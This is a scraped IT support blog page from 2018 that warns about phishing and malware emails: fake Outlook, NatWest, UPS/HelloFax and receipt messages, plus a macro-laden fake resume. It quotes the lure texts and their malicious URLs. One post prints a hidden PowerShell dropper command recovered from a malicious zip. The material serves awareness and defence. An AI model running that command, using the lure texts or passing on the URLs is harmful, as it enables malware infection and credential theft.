sircles.net Computer Support The sircles IT support & solutions blog | Viruses and Malware threats

Twitter Feed Popout byInfofru

The sircles IT support & solutions blog Internet Safety & Security, Windows Tweaks and Server Fixes

Security alert for your linked account #28868 - Fake outlook.com account recovery messages

Security alert for your linked account #28868 - Fake outlook.com account recovery messages   Wa

Security alert for your linked account #28868 - Fake outlook.com account recovery messages

 

Watch out for these fake account recovery messages as they are finding their way into outlook.com and hotmail.com!

 

 

 

 
 
     

 

 

Your profile is listed as the recovery email for recipient@hotmail.com. Don't recognize this profile? click here.

 
     
 

Sign-in attempt was blocked for your linked account
recipient@hotmail.com

Someone just used your password to try to sign in to your profile.

 
     
 

You received this email to let you know about important changes to your profile and services.

© 2018 1600 Amphitheatre Parkway, Mountain View, CA 94043, USA

 

The actual links point to: http://wiki.1rwn.com/ctireaz/radiantlyb.html  from both ther check activity link and the click here link under 'recognize this profile'

The link is not dangerous - it just forwards you to a Canadian Pharmacy page - but do report the originator of the email and the website as neither will be very nice people.

Your Email Domain Account Notification!! Spam

11. October 2018 16:45 by sirclesadmin in Viruses and Malware threats, SPAM, Phishing
Your Email Domain Account Notification!! Spam   This email has been doing the rounds today: &nb

Your Email Domain Account Notification!! Spam

 

This email has been doing the rounds today:

 

 

From:                              YourEmailDomain.com [no-reply@mailserver.com]

Sent:                               11 October 2018 02:01

To:                                   Recipient

Subject:                          YourEmailDomain.com Account Notification!!

 

Email Security info

Your email name@domain.com has reached an upgrade stage, verify your user email to continue usage,

This is for your own safety to continue using your account, click the button below.

 

Verify

 

Note: Please do not ignore this email to avoid your account closure
Thanks,
The security email team.

.

 

Copyright © 2018 Mail! Inc. (Co. Reg. No. 2344507D) All Rights Reserved. Intellectual Property

 The 'verify' link actually points to: https://caravanecafe.ca/mikoko/Qupdate/index.php?email=name@domain.com&browser=unkonown&time=valid which has already been marked as deceptive by the big browsers:

The website itself:

Is fairly convincing looking and I will type them a nice message in the password field commending them on their good work and encouraging them to continue.

The password actually appears to do a lookup of some kind as it reports that it is wrong but perhaps they just want to get as many of your passwords as possible...?

Anyway, stay vigilant and safe!

Spam Warning: Notice from UPS

Spam Warning: Notice from UPS    

Spam Warning: Notice from UPS

 

This is a bit of a confusing one as they do not seem to know who they are, HelloFax or UPS.

Here is the message:

 

From:                                                       UPS Choice <ups@altoedge.com>

Sent:                                                         Wednesday, August 15, 2018 7:31 PM

To:                                                            Recipient

Subject:                                                   Notice from UPS

 

 

HelloFax

The best way to sign and send faxes online

Dear Customer,

You have received a HelloFax

Date/Time: 08/14/2018 09:55 AM
Number of pages: 4

Reference ID Number: TGH757358L.


We appreciate you going paper-less!
- The HelloFax Community

 

We believe the office can be paper less!
HelloFax Send Docs On-line
HelloSign Sign your Documents Online
HelloSign for Gmail Sign from Googlemail

503 Howard Street, Suite 341
San Francisco, CA

Add us to the list of contacts

 

The 'Download Fax Now' button actually points at: http://exumabonefishlodge.com?4eHJe=QIUBNYQASHUBQYUDP which already appears shut down as we just get a:

 

This site can’t be reached

exumabonefishlodge.com’s server IP address could not be found.

 

ERR_NAME_NOT_RESOLVED

 

 

Message on Chrome.

SO no immediate danger here, but this email will be circulating with a hundred different links on it so beware!! Report as spam and report the link to your browser provider.

 

One last point is that the 'add us to the contacts list' is actually a link to: https://dyn550zzd47ox.cloudfront.net/1.52.0/css/images/email/support.vcf

And although this is probably the correct shortcut, it actually downloads a vcf file to your PC from cloudflare...

 

Spam Warning: Your Name, Pack(4M0A_8141) confirmed: 5 items sent

Spam Warning: Your Name, Pack(4M0A_8141) confirmed: 5 items sent &amp;nbsp; This email has been spotted

Spam Warning: Your Name, Pack(4M0A_8141) confirmed: 5 items sent

 

This email has been spotted this week:

 

 

 

From: lou_weihe@clarityconfidenceandcash.com

Sent:                                                         Monday, July 30, 2018 10:52 PM

To:                                                            Recipient

Subject:                                                   Your, Name Pack(4M0A_8141) confirmed: 5 items sent

 

Your order confirmation. Hi Simon, Great news! Your order is now confirmed. We will email you again when your items ship.

 

WOMEN

MEN

ACCESSORIES

HOME DECOR

GADGETS


Hi Your Name,

Great news! Your order is now confirmed. We will email you again when your items ship.

Thanks for shopping with us!

Order ID: 4M0A_8141

Shipping Address:

Your Name
Your Phone Your Postcode 

View Order


This email was sent from a notification-only address that cannot accept incoming emails.
Please do not reply to this message. If you have any questions or concerns, please contact us 

 

 
Which downloads a file: 4M0A_8141-order-Receipt.zip
Zip files are not often used as orders anyway but this website, https://johanwolf.com obviously has a valid certificate and is being misused by someone. The website just seems to forward to Office365 support for some reason???
 
If you unzip the file that is provided you see an image:
 
 
Which presumably pretends to be a real company.
 
And a file which runs a script:
 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -executionpolicy bypass -win hidDEN  -comman cd %USERPROFILE%\Documents; findstr /s bremodilu ..\*.lnk > file.ps1;.\file.ps1;exit
 
Which will make serious changes to your system. Looking at this we are not sure it would work but might try it on an old PC ..?
 
We will let you know.
 
Anyway, report the sender and the website and keep vigilant!
 
 

About a internship! Fake Resume or CV SPAM!

About a internship! SPAM! &amp;nbsp; Microsoft Office documents are a dangerous source of macros and oth

About a internship! Fake Resume or CV SPAM!

 

Microsoft Office documents are a dangerous source of macros and other types of malware. Typically a dangerous document will be disabled by later versions of Microsoft Office in order to protect the user and as a result the modern spam malware office docs have a front page explaining that they need to be unlocked.

Let's have a quick look at one:

Here is a message containing a resume we have received today...

Hello there! I hope you are well!

I am absolutely interested in a internship.
Find my attached resume and reply ASAP.

The password for the file is 123123

Looking forward to hearing back from you!
Dayna

If we double-click the attachment containing 'Danya's Resume' we see the password request in Microsoft Word 2016.

We enter the password provided and then...

 

 

The text in the document pane has actually been added by the spammers. That 'was this information helpful?' text is just an image captured from the Microsoft website just as we have captured this image from the spammers. The 'Yes' and 'No' buttons are not live - they are just there to persuade you that this is a Microsoft message. The text is there to persuade you to enable the macros in this document but definitely do not.

The only true Microsoft advice here is in yellow at the top where you are 'Be careful-email attachments can contain viruses. Unless you need to edit, it's safer to stay in protected view.' and it is. We would suggest that unless you are awaiting the document and it is from the person you are expecting it to be from, never enable a Microsoft Document for editing.

Let us make sure that this document is not one we are expecting - if we click on the File menu on Microsoft Word and select the Info option we can see the below:

 

 

As we can see from the details, this document is nonsense and is not from anyone we know or want to know.

Label these as spam and report the originator to your email administrator or provider.

We have seen the following alternate subjects for the same email:

  1. About a career?
  2. Concerning a internship.
  3. Regarding a career!
  4. Regarding a job?

Mac Detox Software - is it a good thing?

22. May 2018 13:09 by sirclesadmin in Viruses and Malware threats
Mac Detox Software - is it a good thing? &amp;nbsp; If you are a Mac user then you will find your comput

Mac Detox Software - is it a good thing?

 

If you are a Mac user then you will find your computer slowing down just like anyone else's. There is a finite amount of processing power, RAM space and disk throughput that will eventually be maxed-out by the softwares you are running.

The Mac does not have a registry like Windows where the system needs all sorts of details to reference what processes are running and so it is not difficult to remove unwanted start-up programs.

There is a great article on what to do here: https://www.macworld.com/article/2047747/take-control-of-startup-and-login-items.html

MAc detox software - even if it is free - is coming at a cost, whether they are corrupting your browser search results or just recording your activity, you do not need proprietary software to clean a Mac.

We have been seeing a lot of sircles blog spam recently trying to add forwards and links to various Mac clean-up sites and we do not recommend using any. Stick to the trusted sites for information, such as MacWorld and keep your MAc clean of software that may cause more problems than your computer just being slow.

Natwest Spam: Incomplete Security Information

Natwest Spam: Incomplete Security Information &amp;nbsp; &amp;nbsp;

Natwest Spam: Incomplete Security Information

 

You may receive the following message, purporting to be from Natwest:

 

From:                                                       NatWest <info@ipconnect.de>

Sent:                                                        Date

To:                                                            Recipient

Subject:                                                   Incomplete Security Information

 

 

 

 

 

 

 

 

Incomplete Security Information

 

 

 

 

 

Hello,


Information we use to determine the security of your account is missing we need you to confirm as soon as possible.

 

Details:
You are required to review and update missing information*

We have temporarily suspended your online access to prevent any loss to your balance until you securely submit missing information: Click below to continue

RESTORE MY ACCOUNT

 

 

Thank You,
The NatWest Accounts team

 

*The location is approximate and determined by the IP address it was coming from.

This email can't receive replies. For more information, visit the NatWest Accounts Help Center.

 

 

 

 

You received this mandatory email service announcement to update you about important changes to your NatWest product or account.

© 2018 NatWest Inc.,

 

 

  
 
The link in the message tries to take you to: http://www.betonruettler.at/statistik/nwolb/index.php
 
Please mark as spam - the website appears to have already been fixed and the bad content removed... :)
 
 
 
 

Disability Action Alliance - DAA Receipt#

Disability Action Alliance - DAA Receipt# &amp;nbsp;

Disability Action Alliance - DAA Receipt#

 

 

From:                                                        invoice@culqi.net on behalf of Disability Action Alliance – DAA <invoice@culqi.net>

Sent:                                                         Date

To:                                                             Recipent

Subject:                                                     Receipt # 8453985   Receipt # 9599113

 

 

Payment Receipt

YOUR PAYMENT HAS BEEN PROCESSED

Your payment has been received, please find attached your PDF invoice.

   

Spam: Receipt # 255247

Spam:&amp;nbsp;Receipt # 255247 &amp;nbsp; Beware of these fake receipts: Payment Receipt YOUR PAYMENT HAS B

Spam: Receipt # 255247

 

Beware of these fake receipts:

Payment Receipt

YOUR PAYMENT HAS BEEN PROCESSED

We send  Google.Docs document.

Link points to: https://www.ethereumpower.io/itr_inv_doc.zip

Which obviously downloads a inv doc.zip file to corrupt your computer or add a root kit etc.

We have reported the Google link and the website as well as marking the email as spam - please do the same if you receive one of these.

Spam: Receipt # 255247

Spam:&amp;nbsp;Receipt # 255247 &amp;nbsp; Beware of these fake receipts: Payment Receipt YOUR PAYMENT HAS B

Spam: Receipt # 255247

 

Beware of these fake receipts:

Payment Receipt

YOUR PAYMENT HAS BEEN PROCESSED

We send  Google.Docs document.

Link points to: https://www.ethereumpower.io/itr_inv_doc.zip

Which obviously downloads a inv doc.zip file to corrupt your computer or add a root kit etc.

We have reported the Google link and the website as well as marking the email as spam - please do the same if you receive one of these.